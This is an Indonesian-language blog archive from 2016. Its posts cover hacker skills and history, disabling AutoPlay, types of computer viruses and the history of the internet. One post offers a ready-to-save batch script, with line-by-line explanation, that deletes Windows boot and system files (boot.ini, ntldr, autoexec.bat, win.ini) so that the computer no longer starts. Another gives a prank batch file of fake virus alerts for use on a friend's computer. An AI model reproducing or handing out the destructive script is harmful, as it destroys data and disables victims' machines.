  1. Bahasa Mesin, yaitu memberikan perintah kepada komputer dengan memakai kode bahasa biner, contohnya 01100101100110.
  2. Bahasa Tingkat Rendah (ASM) atau dikenal dengan istilah bahasa rakitan (bah.Inggris Assembly), yaitu memberikan perintah kepada komputer dengan memakai kode-kode singkat (kode mnemonic), contohnya MOV, SUB, CMP, JMP, JGE, JL, LOOP, dsb.
  3. Bahasa Tingkat Menengah (C), yaitu bahasa komputer yang memakai campuran instruksi dalam kata-kata bahasa manusia (lihat contoh Bahasa Tingkat Tinggi di bawah) dan instruksi yang bersifat simbolik, contohnya {, }, ?, <<, >>, &&, ||, dsb.
  4. Bahasa Tingkat Tinggi (HTML, XML, JSP, JAVA, VB, PASCAL, DELPHI, C#, F#, PHP, ASP, SQL, ORACLE, PYTHON, PERL, dll) yaitu bahasa komputer yang memakai instruksi berasal dari unsur kata-kata bahasa manusia, contohnya begin, end, if, for, while, and, or, dsb.
Sebagai seorang hacker, semakin kompleks mengetahui bahasa pemrograman maka akan semakin mudah dalam memolak balikkan software, mencari celah, memperbaiki, memberikan solusi untuk memecahkan masalah dan bahkan membangun sebuah aplikasi baru.
Kuncinya adalah semakin dalam mengetahui bahasa mesin, akan lebih mudah dalam berkomunikasi dengan mesin.
Selain mengenal bahasa pemrograman, yang perlu dipelajari adalah sistem yang dibangun dari software yang sudah ada saat ini, sebagai salah satu contoh yaitu Sistem Operasi: *Nix, Linux, FreeBSD, SunOS, Windows, dll.
  1. Jaringan (Networking)
Seorang hacker perlu mengetahui dan mendalami jaringan elektronik dan komputer yang merupakan bagian penting untuk dipelajari, karena jaringan inilah yang menghubungkan antara satu dengan yang lainnya seperti sebuah jaring laba-laba yang tidak terputus.
Ketika kita sudah memahami jaringan maka akan cukup mudah dalam melakukan setting, konfigurasi dan dapat memegang kendali terhadap jaringan. Didalam jaringan inilah alur komunikasi bergerak antara satu perangkat ke perangkat yang lainnya. Pada jaringan inilah banyak protokol komunikasi yang digunakan sehingga perlu juga untuk dipelajari seperti TCP, HTTP/S, FTP/S, dll. Apabila jaringan berada didalam kendali, maka seluruh informasi yang mengalir didalamnya akan sangat mudah untuk didapat, ditambah, diubah, bahkan untuk dihapus sekalipun.
  1. Kriptografi (Cryptography)
Seorang hacker memiliki tantangan dalam hal kriptografi, karena saat ini hampir seluruh transaksi komunikasi sudah menggunakan cryptography sebagai jembatan pelindung. Dengan modal logika yang matang maka cryptography dapat lebih mudah untuk dipelajari walaupun dalam struktur yang sulit. Seorang hacker memerlukan pengetahuan kriptografi untuk menjaga aspek keamanan informasi seperti kerahasiaan informasi, keabsahan informasi, integritas informasi, serta autentikasi informasi dan bahkan untuk mendapatkan dan menerjemahkan informasi itu sendiri.
Ada banyak model kriptografi yang saat ini sudah banyak berkembang yaitu MD5, SHA, DES, AES, Base64, IDEA, BLOWFISH, RSA, Dll. Kriptografi ini banyak digunakan untuk konfigurasi, penyimpanan data dalam database, dan komunikasi transaksi pada jaringan.


Jumat, 14 Oktober 2016

Sejarah Hacker

Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.


Sejarah Hacker
Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.

Kemudian pada tahun 1983, istilah hacker berubah menjadi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker.

Para hacker mengadakan pertemuan setiap setahun sekali yaitu diadakan setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan hacker terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas hacking.

Hacker memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa hackerlah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus dsb. Padahal, mereka adalah cracker. Crackerlah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para hacker dipahami dibagi menjadi 2 golongan White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

Kamis, 13 Oktober 2016

Carar Melindungi Komputer Dari Virus Flashdisk






Banyak virus yang bertebaran melalui flasdisk, kali ini saya akan memberikan cara melindungi komputer dari virus-virus yang berasal dari flashdisk dengan menonaktifkan fungsi autoplay policy setting.Cara ini berlaku untuk OS windows 7 atau Vista.

Setiap kali kita menghubungkan komputer dengan Removable-media seperti memory,flasdisk, atau CD/DVD, maka jendela autorun windows akan terbuka di layar komputer secara otomatis.Sebenarnya fungsi tersebut bertujuan untuk memudahkan user, karena menyediakan beberapa menu seperti membuka folder, memainkan video/music (jika berupa terdapat file multimedia, dsb.

 Akan tetapi, fungsi tersebut bisa jadi berbahaya bagi keamanan komputer. Selain internet, media eksternal merupakan sarana penyebaran virus terbesar. Ketika sebuah media penyimpanan eksternal yang mengandung virus terhubung pada komputer dan Anda langsung membukanya menggunakan menu ‘Open files to view files’ yang ada pada autorun Windows, maka virus langsung masuk ke sistem komputer Anda. Terlebih virus-virus yang bisa aktif secara otomatis seperti Autorun.inf dan lain-lain.

Tutorial :

  1. Tekan tombol windows+R dan ketik gpedit.msc tekan enter.
  2. Klik Computer Configuration –> Administrative Templates –> Windows Components. Di bawahnya Anda akan menemukan AutoPlay Policies.
  3. Pada bagian kanan AutoPlay Policies, klik kanan pada Turn off AutoPlay, dan pilih Edit. Kemudian pada jendela baru yang muncul, pilih Enabled.
  4. Klik tombol apply dan OK
Sekarang fitur autorun windows tidak akan muncul setiap kali  menghubungkan Removable-media dengan komputer.

Cara Membuat Virus Berbahaya Menggunakan Notepad






Dari posting-posting sebelumnya kita sudah membahas Sejarah virus, Jenis virus, dan Cara membuat virus untuk menjaili teman pake notepad. Nah sekarang saya saatnya memberikan cara untuk membuat virus berbahaya bagi komputer menggunakan notepad.

Pertama, Copy Script di bawah ini dan Paste pada notepad anda :
-------------------------------------------------------------------------------------attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

-----------------------------------------------------------------------------------------Lalu, Simpan/Save AS dengan Format .bat Misalnya, Berbahaya.bat

Keterangan Kode :
1. del c:\autoexec.bat  <-->  buat hapus autoexe.bat di direktori C
2. del c:\boot.ini  <-->  buat hapus Boot.ini di direktori C
3. del c:\ntldr  <-->  buat hapus ntldr
4. del c:\windows\win.ini  <-->  untuk hapus file win.ini yang berlokasi di C:/windows
5. attrib -r -s -h  <-->  untuk menampilkan file ke 4 windows tadi yang di supper hidden


Note : Jangan dianggap main! Bila system ini dijalankan di windows anda tidak akan hidup dan juga tidak ada penawarnya jadi gunakanlah dengan manfaat.

Jenis Jenis Virus Komputer



Virus komputer adalah sebuah program perangkat lunak berbahaya yang ditulis dengan sengaja untuk memasuki komputer tanpa izin atau tanpa spengetahuan pengguna. Virus komputer punya kemampuan untuk mengandakan dirinya sendiri, akibatnya dapat terus menyebar. Beberapa virus melakukan sedikit kerusakan, sementara yang lain dapat menyebabkan kerusakan parah atau mempengaruhi kinerja program dan sistem.

Ada berbagai jenis virus yang dapat diklasifikasikan menurut asal mereka, teknik, jenis file yang mereka infeksi, di mana mereka bersembunyi, jenis kerusakan, jenis sistem operasi. Berikut ini berbagai jenis virus komputer beserta penjelasannya .

1. Memory Resident Virus

Virus ini menetapkan dalam memori komputer dan otomatis aktif setiap kali OS berjalan dan menginfeksi semua file yang dibuka.

- Persembunyian: Jenis virus ini bersembunyi dalam RAM dan tinggal di sana bahkan setelah kode berbahaya dijalankan. Virus mendapat kontrol atas memori sistem dan mengalokasikan blok memori di mana ia menjalankan kode sendiri, dan mengeksekusi kode ketika fungsi apapun dijalankan.

- Target: Dapat merusak file dan program yang dibuka, ditutup, disalin, diubah namanya, dll.

- Contoh: Randex, CMJ, Meve, dan MrKlunky.

- Proteksi: Instal program antivirus

2. Direct Action Viruses

Tujuan utama virus ini adalah untuk meniru dan bertindak ketika dijalankan. Ketika kondisi tertentu terpenuhi, virus akan beraksi dan menginfeksi file dalam direktori atau folder yang ditentukan dalam path file AUTOEXEC.BAT. File batch ini selalu terletak di direktori root hard disk dan melakukan operasi tertentu ketika komputer boot.

Teknik FindFirst / FindNext digunakan di mana kode memilih beberapa file sebagai korbannya. Hal ini juga menginfeksi perangkat eksternal seperti pen drive atau hard disk.

- Persembunyian: Virus terus berpindahlokasi  ke file baru setiap kali kode dijalankan, tapi umumnya ditemukan di direktori root pada hard disk.

- Target: Virus ini dapat merusak file. Pada dasarnya, ini adalah file virus-infector.

- Contoh: Vienna virus

- Proteksi: Instal scanner antivirus.


3. Overwrite Viruses

Virus jenis ini menghapus informasi dalam file yang terinfeksi.

- Persembunyian: Virus menggantikan isi file. Namun, tidak mengubah ukuran file.

- Contoh: Way, Trj.Reboot, Trivial.88.D

- Proteksi: Satu-satunya cara untuk membersihkan file yang terinfeksi oleh virus Overwrite adalah dengan menghapus file yang terinfeksi.

4. Boot Sector Virus

Jenis virus ini mempengaruhi sektor boot dari sebuah hard disk. Ini adalah bagian penting dari disk, di mana informasi dari disk itu sendiri disimpan bersama dengan sebuah program yang memungkinkan untuk boot (mulai) . Virus jenis ini juga disebut Master Boot Sector Virus or Master Boot Record Virus.

- Persembunyian: Virus ini bersembunyi di dalam memori hingga DOS mengakses floppy disk, Dan ke manapun data yang boot akses, virus menginfeksi itu.

- Contoh: Polyboot.B, AntiEXE

- Proteksi: Cara terbaik untuk menghindari virus boot sector adalah untuk memastikan floppy disk di write protect.


5. Macro Virus

Macro virus menginfeksi file yang dibuat menggunakan aplikasi atau program tertentu yang berisi macro, seperti doc, Xls, Pps, Mdb, dll. Virus ini otomatis menginfeksi file yang berisi macro, dan juga menginfeksi template dan dokumen. Hal ini disebut juga sebagai jenis virus e-mail.

- Persembunyian: Bersembunyi dalam dokumen yang dibagi melalui e-mail atau jaringan.

- Contoh:Relax, Melissa.A, Bablas, O97M/Y2K

- Proteksi: Teknik perlindungan terbaik adalah  menghindari membuka e-mail dari pengirim yang tidak dikenal. Juga, menonaktifkan macro dapat membantu melindungi data.

6. Directory Virus
Direktori virus (juga disebut Cluster Virus / File System Virus) menginfeksi direktori komputer  dengan mengubah jalan yang menunjukkan lokasi file. Ketika menjalankan program file dengan ekstensi EXE. Atau COM. Yang telah terinfeksi oleh virus, Anda tidak sadar menjalankan program virus, sedangkan file asli dan program sebelumnya dipindahkan oleh virus. Setelah terinfeksi, menjadi mustahil untuk menemukan file asli.

- Persembunyian: Virus ini biasanya terletak dalam satu lokasi disk, tetapi menginfeksi seluruh program dalam direktori.

- Contoh: virus Dir-2

- Proteksi: instal ulang semua file yang terinfeksi setelah memformat disk.

7. Polymorphic Virus

Virus polimorfik mengenkripsi atau menyandikan diri dengan cara yang berbeda (menggunakan algoritma yang berbeda dan kunci enkripsi) setiap kali mereka menginfeksi sistem.

- Contoh: Elkern, Marburg, Setan Bug, dan Tuareg

- Proteksi: Instal antivirus high-end.

8. Companion Viruses

- Persembunyian: umumnya menggunakan nama file yang sama dan membuat ekstensi yang berbeda. Sebagai contoh: Jika ada file "Me.exe", virus membuat file lain bernama "Me.com" dan bersembunyi di file baru. Ketika sistem memanggil nama file "Me", yang ". Com" file dijalankan (sebagai ". Com" memiliki prioritas lebih tinggi daripada "exe."), Sehingga menginfeksi sistem.

- Contoh: Stator, Asimov.1539 dan Terrax.1069

- Proteksi: Instal scanner antivirus dan juga men-download Firewall.

9. FAT Virus

File allocation table (FAT) adalah bagian dari disk yang digunakan untuk menyimpan semua informasi mengenai lokasi file, ruang yang tersedia, ruang tidak dapat digunakan, dll

- Persembunyian: virus FAT menyerang bagian FAT dan dapat merusak informasi penting. Hal ini bisa sangat berbahaya karena mencegah akses ke bagian tertentu dari disk dimana file penting disimpan. Kerusakan yang disebabkan dapat mengakibatkan hilangnya informasi dari file individual atau bahkan seluruh direktori.

- Contoh: link Virus

- Proteksi: Sebelum serangan virus menyebar ke semua file di komputer, car semua file yang benar-benar diperlukan pada hard drive, dan hapus yang yang tidak diperlukan. Mereka mungkin file yang dibuat oleh virus.

10. Multipartite Virus

Virus ini menyebar dalam berbagai cara tergantung pada sistem operasi yang terpasang dan adanya file tertentu.

- Persembunyian: Pada tahap awal, virus ini cenderung bersembunyi di dalam memori kemudian menginfeksi hard disk.

- Contoh: Invader, Flip dan Tequila

- Proteksi: Bersihkan sektor boot dan juga disk untuk menyingkirkan virus, dan kemudian kembalikan semua data di dalamnya. Namun, pastikan bahwa data  bersih.

11. Web Scripting Virus

Banyak halaman web mengunakan kode yang kompleks dalam rangka menciptakan konten yang menarik dan interaktif. Kode ini sering dimanfaatkan untuk  tindakan yang tidak diinginkan.

- Persembunyian: Sumber utama scripting virus web browser atau halaman web yang terinfeksi.

- Contoh: JS.Fortnight adalah virus berbahaya yang menyebar melalui e-mail.

- Proteksi: Instal aplikasi microsoft tool yang merupakan fitur standar pada Windows 2000, Windows 7 dan Vista. Scan komputer dengan aplikasi ini.

12. Worms

Worm adalah program yang sangat mirip dengan virus, memiliki kemampuan untuk mereplikasi diri dan dapat menyebabkan efek negatif pada sistem . Tapi mereka dapat dideteksi dan dihilangkan dengan perangkat lunak antivirus.

- Persembunyian: umumnya ini menyebar melalui e-mail dan jaringan. Mereka tidak menginfeksi file atau merusak mereka, tetapi mereka meniru begitu cepat sehingga seluruh jaringan akan runtuh.

- Contoh: PSWBugbear.B, Lovgate.F, Trile.C, Sobig.D, Mapson

- Proteksi: Instal antivirus versi terbaru.

13. Trojans

Trojan atau Trojan horse adalah kode berbahaya , yang tidak seperti virus, tidak mereproduksi dengan menginfeksi file lainnya, juga tidak mereplikasi diri seperti cacing. Program ini menyamar dirinya sebagai program atau aplikasi yang berguna.

Selain itu, ada banyak virus komputer lain yang memiliki potensi untuk menginfeksi data. Oleh karena itu, lindungi komputer kamu dengan menginstal perangkat lunak antivirus yang berkualitas tinggi dan asli. Selain itu jangan mendownload file sembarangan di situs download gratis.

Sejarah dan Perkembangan Virus Komputer

Munculnya komputer pertama kali juga merupakan lahirnya perkembangan virus komputer. Salah satu pembuat komputer dan menciptakan EDVAC ( Electronic Discrete Variable Automatic Computer) yang bernama John von Newman sekitar tahun 1949, memaparkan dalam makalahnya yang membahas kemungkinan suatu program yang dapat menyebar secara otomatis.

Awal Sejarah dan Perkembangan Virus Komputer

Dalam sejarah dan perkembangan virus komputer, pada tahun 1960 di AT&T Bell Laboratory yang merupakan laboratorium komputer raksasa di dunia, pada saat rehat para ilmuwan komputer yang bekerja di laboratorium tersebut membuat sebuah permainan yang disebut dengan Perang Program atau Core War. Core War itu sendiri adalah membuat suatu program yang dibuat guna menyerang, memperbaiki dan memusnahkan.
Pemenang dalam permainan program ini yaitu pemilik program yang memiliki sisa program terbanyak dalam waktu yang telah ditentukan. Sebenarnya virus termasuk sebuah program/software, namun virus diciptakan untuk hal-hal yang berdampak merugikan.


Seorang ilmuwan komputer Amerika dan dikenal sebagai penemu teknik pertahanan virus komputer yang bernama Frederick B. Cohen sekitar tahun 1983, pada saat itu masih menjadi mahasiswa di University of Southern California School of Engineering (saat ini Viterbi School of Engineering), menulis sebuah program yang dapat menguasai sebuah sistem operasi komputer. Program tersebut merupakan salah satu virus komputer pertama.
Dengan berkembangnya ilmu pengetahuan di bidang komputer, sekitar tahun 1989, ditemukanlah virus komputer yang dikenal dengan virus polimorf. Virus tersebut dikenal dengan V2Px yang dengan sendirinya dapat mengubah diri menjadi varian baru. Sekitar tahun 1990, virus DIR II memiliki kemampuan baru dalam menginfeksi program dengan cara menyerang data-data FAT.

Selasa, 11 Oktober 2016

Cara Membuat Virus Trojan Dengan Notepad


Halo Blogger, Kali ini saya akan tunjukan cara membuat virus trojan yang tidak berbahaya dengan sangat mudah menggunakan notepad tapi cukup mengejutkan jika anda memasang di komputer/laptop teman anda.

 Langkah-langkah :
1.Tekan Windows+R ketik notepad klik enter
2.Copy scriptnya :

start
@echo off
msg * System error
msg * Your computer is got a virus
msg * Please reboot to fix
msg * System error
msg * Please reinstall your microsoft windows
msg * Computer security not fix this problem
msg * Trojan detected
msg * System error

3.Setelah itu simpan ubah ekstensi menjadi .bat
4.Tinggal klik open filenya



Senin, 10 Oktober 2016

Sejarah Internet dan Perkembangan



Sebagian besar masyarakat dunia kini menggunakan internet, bahkan bisa dikatakan hampir semua orang khususnya di perkotaan telah mengenyam akses internet. Namun memang masih banyak masyarakat di berbagai belahan dunia, bahkan termasuk di Indonesia yang masih belum bisa menikmati akses menuju internet, yang penyebabanya cukup banyak, antara lain karena daerah yang terlalu jauh untuk dijangkau jaringan internet, kurangnya perhatian dari pemerintah setempat, dan masih banyak lagi.





Perkembangan yang saat ini dialami dunia internet sangatlah pesat. Bagaimana tidak, yang tadinya hanya bisa dinikmati orang-orang tertentu saja dan fungsinya pun terbatas, kini semua orang bisa menggunakannya tanpa terkecuali dengan akses informasi yang jauh lebih luas dan fungsi yang lebih beragam. Hal itu tentunya ditennggarai oleh penemuan-penemuan hebat yang ada di internet itu sendiri. Mungkin hanya masyarakat daerah pedesaan di Indonesia saja yang belum terdapat akses internet, karena pembangunan jaringan internet di Indonesia tidak merata. Memang mungkin cukup sulit mengembangkan internet di Indonesia ketimbang di negara lain, karena negara kita adalah negara kepulauan yang setiap pulau berpisah-pisah.





Kita sebagai pengguna internet di zaman yang modern ini tentunya akan sangat bermanfaat apabila mempelajari seputar sejarah berdirinya internet, sebagai tanda terima kasih kita karena internet saat ini mampu mengubah peradaban dunia. Karena kami rasa mungkin banyak orang yang sangat tergantung pada internet dalam kehidupan sehari-harinya, mulai dari pemakaian social media sebagai hiburan atau bisnis, membaca artikel menarik di website, hingga kegiatan chatting dengan kawan terdekat. Mari simak sejarahnya lebih detail melalui penjelasan dari Espilen Blog dibawah ini.

Sejarah Internet
Sejarah dimulai pada tanggal Agustus 1962 dan penciptaan internet pertama kali dikemukakan oleh seseorang bernama J.C.R Licklider dari MIT Massachutts Institute of Technology. Konsep awal dinamakan “Galactic Network” oleh dirinya. Ia mengemukakan tentang bagaimana jaringan global yang memungkinkan orang dapat mengakses data dan program dari mana saja. Pada Oktober 1962 beliau mengepalai program penelitian komputer di ARPA yang merupakan bagian dari Departmenet Pertahanan Amerika Serikat.


Proyek dari ARPANET adalah merancang sebuah bentuk jaringan, kehandalan, dan seberapa besar informasi dapat dipindahkan, yang akhirnya semua standar yang mereka tentukan menjadi cikal bakal pembangunan protokol baru yang sekarang kita kenal dengan istilah TCP/IP (Transmission Control Protocol/Internet Protocol).

Sejarah awal dibangunnya proyek itu adalah untuk keperluan militer. Pada saat itu Departemen Pertahanan Amerika Serikat (US Department of Defense) membuat sistem jaringan komputer yang tersebar dengan menghubungkan komputer di daerah-daerah vital untuk mengatasi masalah bila terjadi serangan nuklir dan untuk menghindari terjadinya informasi terpusat, yang apabila terjadi perang dapat mudah dihancurkan.

Pada tahun 1966 Larry Roberts mengembangkan konsep jaringan komputer. Kemudian beliau merencanakan jaringa yang disebut ARPANET yang dipublikasikan pada tahun 1967. Pada tahun 1969 ARPANET telah melibatkan empat buah komputer yang terkoneksi.

Sejarah internet juga dimulai dengan komputer pertama berada di university of California Los Angelos, komputer ke dua berada di Stanford Research Institute, komputer ketiga berada di University of California Barbara dan koputer ke emat berada di University Utah. Pada tahun 1971 jumlah komputer yang terhubung ke ARPANET mencapai 14 buah. Pada tahun ini pulalah protokol Telnet dan FTP berhasil dibangun. Pada tahun 1972 larry Roberts dan Bob Kahn mengenalkan ARPANET pada konferensi ICCC yang diselenggarakan di Washignton.

Sejarah Pada tahun 1972 sejarah perkembangan internet menjelaskan Ray Tomliinson menulis program yang memungkinkan surat elektronik dikirimkan ke jaringan ARPNET. Beliaulah yang merancang konversi “user@host.” Pada tahun ini pula ARPANET menggunakan NCP untuk menstransfer data. Pada tahun yang sama ARPA beruah nama menjadi DARPA. Tambahan huruf D berasal dari kata Defense. Pada tahun ini ARPANET melakukan koneksi international yang pertama dengan University College of London dan Royal Establishment di Norwegia.

Sejarah pada tahun 1978 Unix to Copy Protocol ditemukan di Labolatorium Bell. Program ini berguna untuk melakukan file transfer. Pada tahun 1979 news group yang diberi nama USENET beroperasi dengan dasar UUCP. Penciptanya adalah Tom Truscott dan Jim Ellis (kedua mahasiswa di Duke University) dan Steven Bellovin (dari Universitas North Carolina).

Pemakai dari seluruh dunia bergabung ke grup diskusi ini membicarakan masalah jaringan, politik, agama dan berbagai topik lainnya. Sejarah internet, pada tahun 1982 DCA atau Defense Communication Agency dan DARPA membentuk protokol yang disebut TCP/IP untuk ARPANET. Selanjutnya, Departemen Pertahanan Amerika Serikat menyatakan TCP/IP sebagai sebuah sntadar. Saat itulah internet didefinisikan sebagai sekumpulan jaringan yang terhubung yang menggunakan TCP/IP sebagai protokol.

Sejarah internet pada tahun 1983 ialah John Postel dan Paul Mockapetris dan Craig Partidge mengembangkan Domain Name System (DNS) dan mengusulka sistem pengamatan berbentuk user@host.cdomain. Pada tahun 1984 DNS diperkenalkan di internet dengan menyebutkan nama-nama jenis domain seperti . gov, .mil,.org, .net dan .com.

Pada tahun 1986 TCP/IP mulai tersedia pada workstaiton dan PC. Tahun ini pula National Science Foundation mendanai NSFNET sebagai tulang punggung internet berkapasitas 56 kbps dan mengatur internet hanya ditujukan untuk kepentingan riset dan pemerintah yang bersifat tidak komersial.


Sejarah Internet & Perkembangan Internet Lengkap
Daftar Kejadian Penting Dalam Sejarah Internet dan Perkembangannya

1957
Uni Sovyet (sekarang Rusia) meluncurkan wahana luar angkasa, Sputnik.

1958
Sebagai buntut dari "kekalahan" Amerika Serikat dalam meluncurkan wahana luar angkasa, dibentuklah sebuah badan di dalam Departemen Pertahanan Amerika Serikat, Advanced Research Projects Agency(ARPA), yang bertujuan agar Amerika Serikat mampu meningkatkan ilmu pengetahuan dan teknologi negara tersebut. Salah satu sasarannya adalah teknologi komputer.

1962
Sejarah internet di tahun ini adalah seorang J.C.R. Licklider menulis sebuah tulisan mengenai sebuah visi di mana komputer-komputer dapat saling dihubungkan antara satu dengan lainnya secara global agar setiap komputer tersebut mampu menawarkan akses terhadap program dan juga data. Di tahun ini juga RAND Corporation memulai riset terhadap ide ini (jaringan komputer terdistribusi), yang ditujukan untuk tujuan militer.

1960
Teori mengenai packet-switching dapat diimplementasikan dalam dunia nyata.

1965
Istilah "Hypertext" dikeluarkan oleh Ted Nelson.

1968
Jaringan Tymnet dibuat.

1971
Anggota jaringan ARPANET bertambah menjadi 23 buah node komputer, yang terdiri atas komputer-komputer untuk riset milik pemerintah Amerika Serikat dan universitas.

1972
Sebuah kelompok kerja yang disebut dengan International Network Working Group (INWG) dibuat untuk meningkatkan teknologi jaringan komputer dan juga membuat standar-standar untuk jaringan komputer, termasuk di antaranya adalah Internet. Pembicara pertama dari organisasi ini adalah Vint Cerf, yang kemudian disebut sebagai "Bapak Internet".

1972-1974
Beberapa layanan basis data komersial seperti Dialog, SDC Orbit, Lexis, The New York Times DataBank, dan lainnya, mendaftarkan dirinya ke ARPANET melalui jaringan dial-up.

1973
ARPANET ke luar Amerika Serikat: pada tahun ini, anggota ARPANET bertambah lagi dengan masuknya beberapa universitas di luar Amerika Serikat yakni University College of London dari Inggris dan Royal Radar Establishment di Norwegia.

1974
Vint Cerf dan Bob Kahn mempublikasikan spesifikasi detail protokol Transmission Control Protocol (TCP) dalam artikel "A Protocol for Packet Network Interconnection".

1974
Bolt, Beranet & Newman (BBN), pontraktor untuk ARPANET, membuka sebuah versi komersial dari ARPANET yang mereka sebut sebagai Telenet, yang merupakan layanan paket data publik pertama.

1977
Sudah ada 111 buah komputer yang telah terhubung ke ARPANET.

1978
Protokol TCP dipecah menjadi dua bagian, yakni Transmission Control Protocol dan Internet Protocol(TCP/IP).

1979
Grup diskusi Usenet pertama dibuat oleh Tom Truscott, Jim Ellis dan Steve Bellovin, alumni dari Duke University dan University of North Carolina Amerika Serikat. Setelah itu, penggunaan Usenet pun meningkat secara drastis. Sungguh menarik, di tahun ini juga emoticon diusulkan oleh Kevin McKenzie.

Awal 1980-an
Komputer pribadi (PC) mewabah, dan menjadi bagian dari banyak hidup manusia. Tahun ini tercatat ARPANET telah memiliki anggota hingga 213 host yang terhubung. Layanan BITNET (Because It's Time Network) dimulai, dengan menyediakan layanan e-mail, mailing list, dan juga File Transfer Protocol (FTP).
CSNET (Computer Science Network) pun dibangun pada tahun ini oleh para ilmuwan dan pakar pada bidang ilmu komputer dari berbagai universitas.

1982
Istilah "Internet" pertama kali digunakan, dan TCP/IP diadopsi sebagai protokol universal untuk jaringan tersebut.

1986
Diperkenalkan sistem nama domain, yang sekarang dikenal dengan DNS(Domain Name System)yang berfungsi untuk menyeragamkan sistem pemberian nama alamat di jaringan komputer.


2000-an
Internet berkembang begitu pesat, hal ini bisa dibuktikkan dengan munculnya milyaran situs di dunia. Dan bisnis digital pun telah menjadi trend di berkat perkembangan dari internet.